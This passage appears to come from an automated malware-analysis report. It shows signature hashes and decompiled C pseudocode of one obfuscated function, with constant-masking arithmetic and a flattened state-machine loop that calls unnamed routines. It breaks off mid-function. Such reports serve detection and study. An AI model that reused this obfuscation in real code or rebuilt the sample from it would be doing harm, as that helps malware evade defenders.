                                                                                                                                    • String ID: ;<=$@_`$CA$D#$Kbf:$PB5$Y/c$cg.B$e($gc49$ll~$sJ$tEt$uP$vj$O~t$iS$ja*
                                                                                                                                    • API String ID: 0-258179307
                                                                                                                                    • Opcode ID: 20a6a9f1ae551115a229d5136a93862dac37af99b15aaec216373bd8da355180
                                                                                                                                    • Instruction ID: e7aefd3469c430ac1c7d2a64dfa0a2338408047a971dda431a66e897178fac5c
                                                                                                                                    • Opcode Fuzzy Hash: 20a6a9f1ae551115a229d5136a93862dac37af99b15aaec216373bd8da355180
                                                                                                                                    • Instruction Fuzzy Hash: C272E1715193819FD378CF25C58AB9BBBE2BBC4304F20891DE6DA86260D7B18959CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E002D4B87(void* __ecx) {
                                                                                                                                    				char _v524;
                                                                                                                                    				char _v1044;
                                                                                                                                    				char _v1564;
                                                                                                                                    				char _v2084;
                                                                                                                                    				char _v2604;
                                                                                                                                    				signed int _v2608;
                                                                                                                                    				intOrPtr _v2612;
                                                                                                                                    				intOrPtr _v2616;
                                                                                                                                    				intOrPtr _v2620;
                                                                                                                                    				intOrPtr _v2624;
                                                                                                                                    				char _v2628;
                                                                                                                                    				intOrPtr _v2632;
                                                                                                                                    				char _v2636;
                                                                                                                                    				signed int _v2640;
                                                                                                                                    				signed int _v2644;
                                                                                                                                    				signed int _v2648;
                                                                                                                                    				signed int _v2652;
                                                                                                                                    				signed int _v2656;
                                                                                                                                    				signed int _v2660;
                                                                                                                                    				signed int _v2664;
                                                                                                                                    				signed int _v2668;
                                                                                                                                    				signed int _v2672;
                                                                                                                                    				signed int _v2676;
                                                                                                                                    				signed int _v2680;
                                                                                                                                    				signed int _v2684;
                                                                                                                                    				signed int _v2688;
                                                                                                                                    				signed int _v2692;
                                                                                                                                    				signed int _v2696;
                                                                                                                                    				signed int _v2700;
                                                                                                                                    				signed int _v2704;
                                                                                                                                    				signed int _v2708;
                                                                                                                                    				signed int _v2712;
                                                                                                                                    				signed int _v2716;
                                                                                                                                    				signed int _v2720;
                                                                                                                                    				signed int _v2724;
                                                                                                                                    				signed int _v2728;
                                                                                                                                    				signed int _v2732;
                                                                                                                                    				signed int _v2736;
                                                                                                                                    				signed int _v2740;
                                                                                                                                    				signed int _v2744;
                                                                                                                                    				signed int _v2748;
                                                                                                                                    				signed int _v2752;
                                                                                                                                    				signed int _v2756;
                                                                                                                                    				signed int _v2760;
                                                                                                                                    				signed int _v2764;
                                                                                                                                    				signed int _v2768;
                                                                                                                                    				signed int _v2772;
                                                                                                                                    				signed int _v2776;
                                                                                                                                    				signed int _v2780;
                                                                                                                                    				signed int _v2784;
                                                                                                                                    				signed int _v2788;
                                                                                                                                    				signed int _v2792;
                                                                                                                                    				signed int _v2796;
                                                                                                                                    				signed int _v2800;
                                                                                                                                    				signed int _v2804;
                                                                                                                                    				signed int _v2808;
                                                                                                                                    				signed int _v2812;
                                                                                                                                    				signed int _v2816;
                                                                                                                                    				signed int _v2820;
                                                                                                                                    				signed int _v2824;
                                                                                                                                    				signed int _v2828;
                                                                                                                                    				signed int _v2832;
                                                                                                                                    				signed int _v2836;
                                                                                                                                    				signed int _v2840;
                                                                                                                                    				signed int _v2844;
                                                                                                                                    				signed int _v2848;
                                                                                                                                    				signed int _v2852;
                                                                                                                                    				signed int _v2856;
                                                                                                                                    				signed int _v2860;
                                                                                                                                    				signed int _v2864;
                                                                                                                                    				signed int _v2868;
                                                                                                                                    				signed int _v2872;
                                                                                                                                    				signed int _v2876;
                                                                                                                                    				signed int _v2880;
                                                                                                                                    				signed int _v2884;
                                                                                                                                    				signed int _v2888;
                                                                                                                                    				signed int _v2892;
                                                                                                                                    				signed int _v2896;
                                                                                                                                    				signed int _v2900;
                                                                                                                                    				signed int _v2904;
                                                                                                                                    				signed int _v2908;
                                                                                                                                    				signed int _v2912;
                                                                                                                                    				signed int _v2916;
                                                                                                                                    				signed int _v2920;
                                                                                                                                    				signed int _v2924;
                                                                                                                                    				signed int _v2928;
                                                                                                                                    				void* _t703;
                                                                                                                                    				void* _t707;
                                                                                                                                    				signed int _t708;
                                                                                                                                    				signed int _t717;
                                                                                                                                    				void* _t730;
                                                                                                                                    				void* _t736;
                                                                                                                                    				signed int _t738;
                                                                                                                                    				signed int _t739;
                                                                                                                                    				signed int _t740;
                                                                                                                                    				signed int _t741;
                                                                                                                                    				signed int _t742;
                                                                                                                                    				signed int _t743;
                                                                                                                                    				signed int _t744;
                                                                                                                                    				signed int _t745;
                                                                                                                                    				void* _t758;
                                                                                                                                    				signed int _t798;
                                                                                                                                    				void* _t803;
                                                                                                                                    				void* _t804;
                                                                                                                                    				void* _t811;
                                                                                                                                    
                                                                                                                                    				_v2608 = _v2608 & 0x00000000;
                                                                                                                                    				_v2616 = 0xa2c333;
                                                                                                                                    				_v2612 = 0xd97943;
                                                                                                                                    				_v2696 = 0x74b91;
                                                                                                                                    				_v2696 = _v2696 + 0xffffab65;
                                                                                                                                    				_v2696 = _v2696 ^ 0x0006f6df;
                                                                                                                                    				_v2804 = 0x130b03;
                                                                                                                                    				_v2804 = _v2804 << 9;
                                                                                                                                    				_v2804 = _v2804 + 0x8374;
                                                                                                                                    				_v2804 = _v2804 ^ 0x26068974;
                                                                                                                                    				_v2876 = 0x240a80;
                                                                                                                                    				_v2876 = _v2876 >> 6;
                                                                                                                                    				_v2876 = _v2876 >> 5;
                                                                                                                                    				_v2876 = _v2876 ^ 0x3e269fec;
                                                                                                                                    				_v2876 = _v2876 ^ 0x3e253447;
                                                                                                                                    				_v2924 = 0x49db5b;
                                                                                                                                    				_v2924 = _v2924 + 0xd552;
                                                                                                                                    				_t803 = __ecx;
                                                                                                                                    				_t798 = 0xce4571;
                                                                                                                                    				_t738 = 0x27;
                                                                                                                                    				_v2924 = _v2924 / _t738;
                                                                                                                                    				_v2924 = _v2924 + 0x3019;
                                                                                                                                    				_v2924 = _v2924 ^ 0x0006d24f;
                                                                                                                                    				_v2796 = 0xf8ea63;
                                                                                                                                    				_v2796 = _v2796 << 3;
                                                                                                                                    				_v2796 = _v2796 + 0x8798;
                                                                                                                                    				_v2796 = _v2796 ^ 0x07c9cae5;
                                                                                                                                    				_v2864 = 0x679d3b;
                                                                                                                                    				_t739 = 0x25;
                                                                                                                                    				_v2864 = _v2864 * 0x7a;
                                                                                                                                    				_v2864 = _v2864 / _t739;
                                                                                                                                    				_v2864 = _v2864 << 0xc;
                                                                                                                                    				_v2864 = _v2864 ^ 0x5a5eda92;
                                                                                                                                    				_v2688 = 0xbc1f25;
                                                                                                                                    				_v2688 = _v2688 << 0xd;
                                                                                                                                    				_v2688 = _v2688 ^ 0x83e15555;
                                                                                                                                    				_v2700 = 0xc3e9b4;
                                                                                                                                    				_v2700 = _v2700 ^ 0x7e7d7a5b;
                                                                                                                                    				_v2700 = _v2700 ^ 0x7ebc2479;
                                                                                                                                    				_v2684 = 0x348655;
                                                                                                                                    				_v2684 = _v2684 + 0xffff5240;
                                                                                                                                    				_v2684 = _v2684 ^ 0x0038d539;
                                                                                                                                    				_v2836 = 0xc8c90d;
                                                                                                                                    				_v2836 = _v2836 | 0x6050777e;
                                                                                                                                    				_v2836 = _v2836 + 0xfffffb37;
                                                                                                                                    				_v2836 = _v2836 << 0xe;
                                                                                                                                    				_v2836 = _v2836 ^ 0x3ea8df0c;
                                                                                                                                    				_v2664 = 0x4ea234;
                                                                                                                                    				_v2664 = _v2664 ^ 0x152f142f;
                                                                                                                                    				_v2664 = _v2664 ^ 0x1568dd81;
                                                                                                                                    				_v2900 = 0xa78742;
                                                                                                                                    				_v2900 = _v2900 * 0x70;
                                                                                                                                    				_v2900 = _v2900 + 0x89c7;
                                                                                                                                    				_v2900 = _v2900 * 0x26;
                                                                                                                                    				_v2900 = _v2900 ^ 0xe13351a3;
                                                                                                                                    				_v2752 = 0x43c729;
                                                                                                                                    				_v2752 = _v2752 * 9;
                                                                                                                                    				_v2752 = _v2752 >> 0xc;
                                                                                                                                    				_v2752 = _v2752 ^ 0x0004a0a7;
                                                                                                                                    				_v2656 = 0x163ba0;
                                                                                                                                    				_v2656 = _v2656 | 0x3b2cca0a;
                                                                                                                                    				_v2656 = _v2656 ^ 0x3b3c61f3;
                                                                                                                                    				_v2800 = 0x539f85;
                                                                                                                                    				_v2800 = _v2800 + 0xffff9927;
                                                                                                                                    				_v2800 = _v2800 >> 0xd;
                                                                                                                                    				_v2800 = _v2800 ^ 0x000ca278;
                                                                                                                                    				_v2892 = 0xaa9f70;
                                                                                                                                    				_v2892 = _v2892 | 0xffd04745;
                                                                                                                                    				_t740 = 0x33;
                                                                                                                                    				_v2892 = _v2892 * 0x48;
                                                                                                                                    				_v2892 = _v2892 + 0xabed;
                                                                                                                                    				_v2892 = _v2892 ^ 0xfe85b4b6;
                                                                                                                                    				_v2728 = 0x66b1f8;
                                                                                                                                    				_v2728 = _v2728 + 0xffffb85a;
                                                                                                                                    				_v2728 = _v2728 + 0xffff17c5;
                                                                                                                                    				_v2728 = _v2728 ^ 0x00666892;
                                                                                                                                    				_v2792 = 0x34b823;
                                                                                                                                    				_v2792 = _v2792 + 0x705f;
                                                                                                                                    				_v2792 = _v2792 | 0x13d147dd;
                                                                                                                                    				_v2792 = _v2792 ^ 0x13fd2081;
                                                                                                                                    				_v2884 = 0x7f5269;
                                                                                                                                    				_v2884 = _v2884 >> 0x10;
                                                                                                                                    				_v2884 = _v2884 + 0xdf59;
                                                                                                                                    				_v2884 = _v2884 ^ 0x086ba2e3;
                                                                                                                                    				_v2884 = _v2884 ^ 0x086346ed;
                                                                                                                                    				_v2784 = 0x4150c;
                                                                                                                                    				_v2784 = _v2784 ^ 0xadfae27c;
                                                                                                                                    				_v2784 = _v2784 << 0xf;
                                                                                                                                    				_v2784 = _v2784 ^ 0x7bb89155;
                                                                                                                                    				_v2860 = 0x3ff4f9;
                                                                                                                                    				_v2860 = _v2860 + 0x97ef;
                                                                                                                                    				_v2860 = _v2860 ^ 0x8a52113e;
                                                                                                                                    				_v2860 = _v2860 * 0x3b;
                                                                                                                                    				_v2860 = _v2860 ^ 0xd244680a;
                                                                                                                                    				_v2920 = 0xf20633;
                                                                                                                                    				_v2920 = _v2920 >> 0xa;
                                                                                                                                    				_v2920 = _v2920 << 6;
                                                                                                                                    				_v2920 = _v2920 | 0x86ded8f3;
                                                                                                                                    				_v2920 = _v2920 ^ 0x86d0715a;
                                                                                                                                    				_v2676 = 0xbc4416;
                                                                                                                                    				_v2676 = _v2676 + 0x253a;
                                                                                                                                    				_v2676 = _v2676 ^ 0x00bded5f;
                                                                                                                                    				_v2928 = 0x15fa7c;
                                                                                                                                    				_v2928 = _v2928 >> 1;
                                                                                                                                    				_v2928 = _v2928 * 0x6e;
                                                                                                                                    				_v2928 = _v2928 >> 4;
                                                                                                                                    				_v2928 = _v2928 ^ 0x00445a38;
                                                                                                                                    				_v2844 = 0xaff44e;
                                                                                                                                    				_v2844 = _v2844 * 0x28;
                                                                                                                                    				_v2844 = _v2844 ^ 0x281c7ad4;
                                                                                                                                    				_v2844 = _v2844 * 0xe;
                                                                                                                                    				_v2844 = _v2844 ^ 0xcf625ac8;
                                                                                                                                    				_v2744 = 0x5c05ba;
                                                                                                                                    				_v2744 = _v2744 << 1;
                                                                                                                                    				_v2744 = _v2744 ^ 0x54918a83;
                                                                                                                                    				_v2744 = _v2744 ^ 0x542c1472;
                                                                                                                                    				_v2904 = 0xa399f4;
                                                                                                                                    				_v2904 = _v2904 / _t740;
                                                                                                                                    				_t741 = 9;
                                                                                                                                    				_v2904 = _v2904 / _t741;
                                                                                                                                    				_v2904 = _v2904 >> 0xb;
                                                                                                                                    				_v2904 = _v2904 ^ 0x000d27e7;
                                                                                                                                    				_v2912 = 0xbe4d5b;
                                                                                                                                    				_v2912 = _v2912 << 2;
                                                                                                                                    				_v2912 = _v2912 >> 8;
                                                                                                                                    				_v2912 = _v2912 + 0xbc5;
                                                                                                                                    				_v2912 = _v2912 ^ 0x000f01bd;
                                                                                                                                    				_v2888 = 0xb7f9c;
                                                                                                                                    				_v2888 = _v2888 ^ 0x23a090a0;
                                                                                                                                    				_v2888 = _v2888 + 0xffffcb65;
                                                                                                                                    				_v2888 = _v2888 + 0xffffb53f;
                                                                                                                                    				_v2888 = _v2888 ^ 0x23a896a2;
                                                                                                                                    				_v2776 = 0xcbb323;
                                                                                                                                    				_v2776 = _v2776 + 0x81c3;
                                                                                                                                    				_v2776 = _v2776 >> 1;
                                                                                                                                    				_v2776 = _v2776 ^ 0x00676393;
                                                                                                                                    				_v2648 = 0x271f91;
                                                                                                                                    				_v2648 = _v2648 + 0xffff9397;
                                                                                                                                    				_v2648 = _v2648 ^ 0x0029f035;
                                                                                                                                    				_v2896 = 0x78618c;
                                                                                                                                    				_v2896 = _v2896 << 0xc;
                                                                                                                                    				_v2896 = _v2896 ^ 0x0a821cde;
                                                                                                                                    				_v2896 = _v2896 + 0xb475;
                                                                                                                                    				_v2896 = _v2896 ^ 0x8c94da80;
                                                                                                                                    				_v2720 = 0xacdc2a;
                                                                                                                                    				_v2720 = _v2720 | 0x57611697;
                                                                                                                                    				_v2720 = _v2720 ^ 0xc01b1ef4;
                                                                                                                                    				_v2720 = _v2720 ^ 0x97fc8dfe;
                                                                                                                                    				_v2668 = 0x55603e;
                                                                                                                                    				_v2668 = _v2668 >> 1;
                                                                                                                                    				_v2668 = _v2668 ^ 0x002dad1d;
                                                                                                                                    				_v2828 = 0xf126f6;
                                                                                                                                    				_t742 = 0x29;
                                                                                                                                    				_v2828 = _v2828 * 0x43;
                                                                                                                                    				_v2828 = _v2828 + 0x8cbb;
                                                                                                                                    				_v2828 = _v2828 ^ 0x3f126f56;
                                                                                                                                    				_v2768 = 0x9c087b;
                                                                                                                                    				_v2768 = _v2768 << 9;
                                                                                                                                    				_v2768 = _v2768 + 0xffffe171;
                                                                                                                                    				_v2768 = _v2768 ^ 0x3813f585;
                                                                                                                                    				_v2880 = 0xb815a3;
                                                                                                                                    				_v2880 = _v2880 ^ 0x72879ea7;
                                                                                                                                    				_v2880 = _v2880 / _t742;
                                                                                                                                    				_v2880 = _v2880 + 0xc3b;
                                                                                                                                    				_v2880 = _v2880 ^ 0x02c00b8a;
                                                                                                                                    				_v2872 = 0xffe9a8;
                                                                                                                                    				_v2872 = _v2872 | 0x05f4b9e7;
                                                                                                                                    				_v2872 = _v2872 + 0xffff2424;
                                                                                                                                    				_v2872 = _v2872 << 7;
                                                                                                                                    				_v2872 = _v2872 ^ 0xff8a2c7e;
                                                                                                                                    				_v2808 = 0x17a98a;
                                                                                                                                    				_t743 = 0x6a;
                                                                                                                                    				_v2808 = _v2808 * 0x35;
                                                                                                                                    				_v2808 = _v2808 + 0x8a0b;
                                                                                                                                    				_v2808 = _v2808 ^ 0x04e27d5d;
                                                                                                                                    				_v2644 = 0x3aca8c;
                                                                                                                                    				_v2644 = _v2644 | 0x1dba2023;
                                                                                                                                    				_v2644 = _v2644 ^ 0x1dba33fd;
                                                                                                                                    				_v2760 = 0xa9a4ba;
                                                                                                                                    				_v2760 = _v2760 ^ 0x6721c4f3;
                                                                                                                                    				_v2760 = _v2760 + 0xffff7b43;
                                                                                                                                    				_v2760 = _v2760 ^ 0x6786e634;
                                                                                                                                    				_v2660 = 0xef5940;
                                                                                                                                    				_t327 =  &_v2660; // 0xef5940
                                                                                                                                    				_v2660 =  *_t327 / _t743;
                                                                                                                                    				_v2660 = _v2660 ^ 0x0008b7a5;
                                                                                                                                    				_v2640 = 0x8c91f9;
                                                                                                                                    				_v2640 = _v2640 + 0x2aa0;
                                                                                                                                    				_v2640 = _v2640 ^ 0x008fd6f1;
                                                                                                                                    				_v2716 = 0xebae10;
                                                                                                                                    				_v2716 = _v2716 + 0x2e93;
                                                                                                                                    				_v2716 = _v2716 >> 3;
                                                                                                                                    				_v2716 = _v2716 ^ 0x0012b27f;
                                                                                                                                    				_v2692 = 0xf4ef17;
                                                                                                                                    				_v2692 = _v2692 ^ 0x14a8ca79;
                                                                                                                                    				_v2692 = _v2692 ^ 0x145940a6;
                                                                                                                                    				_v2712 = 0x90da21;
                                                                                                                                    				_v2712 = _v2712 * 0x5c;
                                                                                                                                    				_v2712 = _v2712 << 6;
                                                                                                                                    				_v2712 = _v2712 ^ 0x039c340b;
                                                                                                                                    				_v2812 = 0x599c06;
                                                                                                                                    				_v2812 = _v2812 | 0x7b64813d;
                                                                                                                                    				_v2812 = _v2812 * 0x3e;
                                                                                                                                    				_v2812 = _v2812 ^ 0xe8633365;
                                                                                                                                    				_v2748 = 0x57b46;
                                                                                                                                    				_t744 = 0x38;
                                                                                                                                    				_v2748 = _v2748 / _t744;
                                                                                                                                    				_v2748 = _v2748 + 0xffffe4a2;
                                                                                                                                    				_v2748 = _v2748 ^ 0xffff7983;
                                                                                                                                    				_v2856 = 0xb347e1;
                                                                                                                                    				_v2856 = _v2856 << 0xf;
                                                                                                                                    				_v2856 = _v2856 + 0xc3e6;
                                                                                                                                    				_v2856 = _v2856 ^ 0xcd6ff0ef;
                                                                                                                                    				_v2856 = _v2856 ^ 0x6e991901;
                                                                                                                                    				_v2756 = 0x3d21e7;
                                                                                                                                    				_v2756 = _v2756 + 0x4052;
                                                                                                                                    				_v2756 = _v2756 + 0xfab6;
                                                                                                                                    				_v2756 = _v2756 ^ 0x0033d413;
                                                                                                                                    				_v2680 = 0xeea097;
                                                                                                                                    				_v2680 = _v2680 * 0x29;
                                                                                                                                    				_v2680 = _v2680 ^ 0x26367c85;
                                                                                                                                    				_v2852 = 0x9a84c7;
                                                                                                                                    				_v2852 = _v2852 << 4;
                                                                                                                                    				_v2852 = _v2852 + 0x5305;
                                                                                                                                    				_v2852 = _v2852 * 0x47;
                                                                                                                                    				_v2852 = _v2852 ^ 0xadc8f5b7;
                                                                                                                                    				_v2736 = 0x1d92c0;
                                                                                                                                    				_v2736 = _v2736 ^ 0x4e3febcd;
                                                                                                                                    				_v2736 = _v2736 ^ 0x2a5eeaad;
                                                                                                                                    				_v2736 = _v2736 ^ 0x647637b5;
                                                                                                                                    				_v2916 = 0x7a6f6e;
                                                                                                                                    				_v2916 = _v2916 << 3;
                                                                                                                                    				_v2916 = _v2916 | 0x74549758;
                                                                                                                                    				_v2916 = _v2916 * 0x5e;
                                                                                                                                    				_v2916 = _v2916 ^ 0x014df6ca;
                                                                                                                                    				_v2820 = 0x88f64;
                                                                                                                                    				_v2820 = _v2820 << 0xb;
                                                                                                                                    				_v2820 = _v2820 ^ 0x8d7f89a1;
                                                                                                                                    				_v2820 = _v2820 ^ 0xc90720e1;
                                                                                                                                    				_v2672 = 0x9d7b6a;
                                                                                                                                    				_v2672 = _v2672 * 0x74;
                                                                                                                                    				_v2672 = _v2672 ^ 0x47521deb;
                                                                                                                                    				_v2868 = 0x2a980b;
                                                                                                                                    				_v2868 = _v2868 << 2;
                                                                                                                                    				_v2868 = _v2868 * 0x37;
                                                                                                                                    				_v2868 = _v2868 * 0x45;
                                                                                                                                    				_v2868 = _v2868 ^ 0xdda58f8d;
                                                                                                                                    				_v2704 = 0xd94882;
                                                                                                                                    				_v2704 = _v2704 >> 7;
                                                                                                                                    				_v2704 = _v2704 ^ 0x000dd1c5;
                                                                                                                                    				_v2908 = 0x8685cf;
                                                                                                                                    				_v2908 = _v2908 >> 6;
                                                                                                                                    				_v2908 = _v2908 + 0x478f;
                                                                                                                                    				_v2908 = _v2908 | 0x9a4acbdf;
                                                                                                                                    				_v2908 = _v2908 ^ 0x9a416c75;
                                                                                                                                    				_v2724 = 0x3983d7;
                                                                                                                                    				_v2724 = _v2724 ^ 0xaf8ece10;
                                                                                                                                    				_v2724 = _v2724 + 0xfffffe8c;
                                                                                                                                    				_v2724 = _v2724 ^ 0xafb9f002;
                                                                                                                                    				_v2652 = 0xb48fd9;
                                                                                                                                    				_v2652 = _v2652 >> 7;
                                                                                                                                    				_v2652 = _v2652 ^ 0x0003170e;
                                                                                                                                    				_v2732 = 0x26e706;
                                                                                                                                    				_v2732 = _v2732 + 0xffff7cb3;
                                                                                                                                    				_v2732 = _v2732 << 7;
                                                                                                                                    				_v2732 = _v2732 ^ 0x13307998;
                                                                                                                                    				_v2840 = 0xdaf489;
                                                                                                                                    				_v2840 = _v2840 ^ 0x20b9ad9c;
                                                                                                                                    				_v2840 = _v2840 + 0xa5fa;
                                                                                                                                    				_v2840 = _v2840 ^ 0x206e4944;
                                                                                                                                    				_v2848 = 0x15799;
                                                                                                                                    				_v2848 = _v2848 + 0xffffbd76;
                                                                                                                                    				_v2848 = _v2848 | 0x84cc3dff;
                                                                                                                                    				_v2848 = _v2848 ^ 0x84c4ee28;
                                                                                                                                    				_v2740 = 0x344f78;
                                                                                                                                    				_v2740 = _v2740 | 0xed30b44e;
                                                                                                                                    				_v2740 = _v2740 + 0x582d;
                                                                                                                                    				_v2740 = _v2740 ^ 0xed3a4892;
                                                                                                                                    				_v2764 = 0x3aec11;
                                                                                                                                    				_t745 = 0x14;
                                                                                                                                    				_v2764 = _v2764 * 0x24;
                                                                                                                                    				_v2764 = _v2764 * 0xd;
                                                                                                                                    				_v2764 = _v2764 ^ 0x6bb19aaa;
                                                                                                                                    				_v2772 = 0xa2a4e3;
                                                                                                                                    				_v2772 = _v2772 * 0x54;
                                                                                                                                    				_v2772 = _v2772 + 0xd74c;
                                                                                                                                    				_v2772 = _v2772 ^ 0x35517ae7;
                                                                                                                                    				_v2780 = 0xc7cad3;
                                                                                                                                    				_v2780 = _v2780 ^ 0xe16f0727;
                                                                                                                                    				_v2780 = _v2780 + 0xa55f;
                                                                                                                                    				_v2780 = _v2780 ^ 0xe1ad612a;
                                                                                                                                    				_v2788 = 0x30bac2;
                                                                                                                                    				_v2788 = _v2788 << 2;
                                                                                                                                    				_v2788 = _v2788 * 0x19;
                                                                                                                                    				_v2788 = _v2788 ^ 0x130f6af8;
                                                                                                                                    				_v2708 = 0x5b81b7;
                                                                                                                                    				_v2708 = _v2708 << 0xd;
                                                                                                                                    				_v2708 = _v2708 ^ 0x7032fecb;
                                                                                                                                    				_v2816 = 0xe0b39a;
                                                                                                                                    				_v2816 = _v2816 + 0xf3c;
                                                                                                                                    				_v2816 = _v2816 * 0x29;
                                                                                                                                    				_v2816 = _v2816 ^ 0x23fa5b32;
                                                                                                                                    				_v2832 = 0xb37143;
                                                                                                                                    				_v2832 = _v2832 + 0xffff99de;
                                                                                                                                    				_v2832 = _v2832 / _t745;
                                                                                                                                    				_v2832 = _v2832 | 0xcb90c15e;
                                                                                                                                    				_v2832 = _v2832 ^ 0xcb9cb56b;
                                                                                                                                    				_v2824 = 0xf7e429;
                                                                                                                                    				_v2824 = _v2824 << 0x10;
                                                                                                                                    				_v2824 = _v2824 ^ 0x4b169193;
                                                                                                                                    				_v2824 = _v2824 ^ 0xaf30b470;
                                                                                                                                    				_t703 = E002D7CDB(_t745);
                                                                                                                                    				_t797 = _v2708;
                                                                                                                                    				_t736 = _t703;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					do {
                                                                                                                                    						while(1) {
                                                                                                                                    							L2:
                                                                                                                                    							_t811 = _t798 - 0xa06a9d5;
                                                                                                                                    							if(_t811 <= 0) {
                                                                                                                                    								break;
                                                                                                                                    							}
                                                                                                                                    							__eflags = _t798 - 0xae01df1;
                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                    								_push(_v2740);
                                                                                                                                    								_push(0);
                                                                                                                                    								_push(_t745);
                                                                                                                                    								_push(1);
                                                                                                                                    								_push(0);
                                                                                                                                    								_push(_v2848);
                                                                                                                                    								_t745 = _v2732;
                                                                                                                                    								_push( &_v524);
                                                                                                                                    								E002CAB87(_t745, _v2840, __eflags);
                                                                                                                                    								_t804 = _t804 + 0x1c;
                                                                                                                                    								_t798 = 0xfe27958;
                                                                                                                                    								_t707 = 0x8a3cf08;
                                                                                                                                    								goto L24;
                                                                                                                                    							} else {
                                                                                                                                    								__eflags = _t798 - 0xb104717;
                                                                                                                                    								if(_t798 == 0xb104717) {
                                                                                                                                    									_t745 = _v2748;
                                                                                                                                    									_t708 = E002C4816(_t745, _v2632, _v2856, _v2636, _v2756, _v2680);
                                                                                                                                    									_t797 = _t708;
                                                                                                                                    									_t804 = _t804 + 0x10;
                                                                                                                                    									__eflags = _t708;
                                                                                                                                    									_t707 = 0x8a3cf08;
                                                                                                                                    									_t798 =  !=  ? 0x8a3cf08 : 0xa06a9d5;
                                                                                                                                    									continue;
                                                                                                                                    								} else {
                                                                                                                                    									__eflags = _t798 - 0xe3ea8aa;
                                                                                                                                    									if(_t798 == 0xe3ea8aa) {
                                                                                                                                    										return E002D1E67(_v2708, _v2816, _v2832, _v2824, _v2628);
                                                                                                                                    									}
                                                                                                                                    									__eflags = _t798 - 0xfe27958;
                                                                                                                                    									if(_t798 != 0xfe27958) {
                                                                                                                                    										goto L24;
                                                                                                                                    									} else {
                                                                                                                                    										E002D8519(_v2764, _v2772, _t797);
                                                                                                                                    										_pop(_t745);
                                                                                                                                    										_t798 = 0xa06a9d5;
                                                                                                                                    										while(1) {
                                                                                                                                    											L1:
                                                                                                                                    											goto L2;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							L27:
                                                                                                                                    							return _t717;
                                                                                                                                    						}
                                                                                                                                    						if(_t811 == 0) {
                                                                                                                                    							E002D8519(_v2780, _v2788, _v2636);
                                                                                                                                    							_pop(_t745);
                                                                                                                                    							_t798 = 0xe3ea8aa;
                                                                                                                                    							while(1) {
                                                                                                                                    								L1:
                                                                                                                                    								goto L2;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						if(_t798 == 0xce4571) {
                                                                                                                                    							_push(_v2700);
                                                                                                                                    							_push(_v2696);
                                                                                                                                    							_push(_v2688);
                                                                                                                                    							_t745 = _v2796;
                                                                                                                                    							_push( &_v1044);
                                                                                                                                    							E002D46BB(_t745, _v2864);
                                                                                                                                    							_t804 = _t804 - 0xc + 0x1c;
                                                                                                                                    							_t798 = 0x2f0d176;
                                                                                                                                    							while(1) {
                                                                                                                                    								L1:
                                                                                                                                    								goto L2;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						if(_t798 == 0x277711d) {
                                                                                                                                    							_v2624 = E002C59E9();
                                                                                                                                    							_v2620 = 2 + E002CCB52(_v2668, _t714, _v2828, _v2768, _v2880) * 2;
                                                                                                                                    							_t745 =  &_v2628;
                                                                                                                                    							_t717 = E002D8727(_t745, _v2804, _v2668, _v2872, _v2808, _v2668, _v2644, _t736, _t736, _v2760, _t736, _v2660, _v2640);
                                                                                                                                    							_t804 = _t804 + 0x38;
                                                                                                                                    							__eflags = _t717;
                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                    								_t798 = 0x47e8611;
                                                                                                                                    								goto L1;
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							if(_t798 == 0x2f0d176) {
                                                                                                                                    								E002DDA22(_v2684, _v2836, __eflags, _v2664,  &_v2084, _t745, _v2900);
                                                                                                                                    								 *((short*)(E002CB6CF( &_v2084, _v2752, _v2656, _v2800))) = 0;
                                                                                                                                    								E002C8969(_v2892,  &_v1564, __eflags, _v2728, _v2792);
                                                                                                                                    								_push(_v2860);
                                                                                                                                    								_push(_v2784);
                                                                                                                                    								E002C47CE( &_v2084, _v2920, _v2884, _v2676, _v2928, E002DDCF7(_v2884, 0x2c1308, __eflags),  &_v1564, _v2844, _v2744);
                                                                                                                                    								E002CA8B0(_v2904, _t722, _v2912);
                                                                                                                                    								_t745 = _v2888;
                                                                                                                                    								_t717 = E002CEA99(_t745, _t803, _v2776, _v2648,  &_v2604, _v2896);
                                                                                                                                    								_t804 = _t804 + 0x5c;
                                                                                                                                    								__eflags = _t717;
                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                    									_t798 = 0x277711d;
                                                                                                                                    									while(1) {
                                                                                                                                    										L1:
                                                                                                                                    										goto L2;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								if(_t798 == 0x47e8611) {
                                                                                                                                    									_t745 =  &_v2636;
                                                                                                                                    									E002DDEDC(_t745, _v2716, _v2692, _v2712,  &_v2628, _v2812);
                                                                                                                                    									_t804 = _t804 + 0x10;
                                                                                                                                    									asm("sbb esi, esi");
                                                                                                                                    									_t798 = (_t798 & 0xfcd19e6d) + 0xe3ea8aa;
                                                                                                                                    									while(1) {
                                                                                                                                    										L1:
                                                                                                                                    										goto L2;
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									_t816 = _t798 - _t707;
                                                                                                                                    									if(_t798 != _t707) {
                                                                                                                                    										goto L24;
                                                                                                                                    									} else {
                                                                                                                                    										_push(_v2916);
                                                                                                                                    										_push(_v2736);
                                                                                                                                    										_t730 = E002DDCF7(_v2852, 0x2c13f8, _t816);
                                                                                                                                    										_pop(_t758);
                                                                                                                                    										E002D453F(_v2820, _t816, _v2672, _t730, _v2868,  &_v1044, _t758, _v2704, _v2908, _t797,  &_v2604);
                                                                                                                                    										_t804 = _t804 + 0x24;
                                                                                                                                    										E002CA8B0(_v2724, _t730, _v2652);
                                                                                                                                    										_pop(_t745);
                                                                                                                                    										_t798 = 0xae01df1;
                                                                                                                                    										while(1) {
                                                                                                                                    											L1:
                                                                                                                                    											goto L2;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						goto L27;
                                                                                                                                    						L24:
                                                                                                                                    						__eflags = _t798 - 0xe39a6fa;
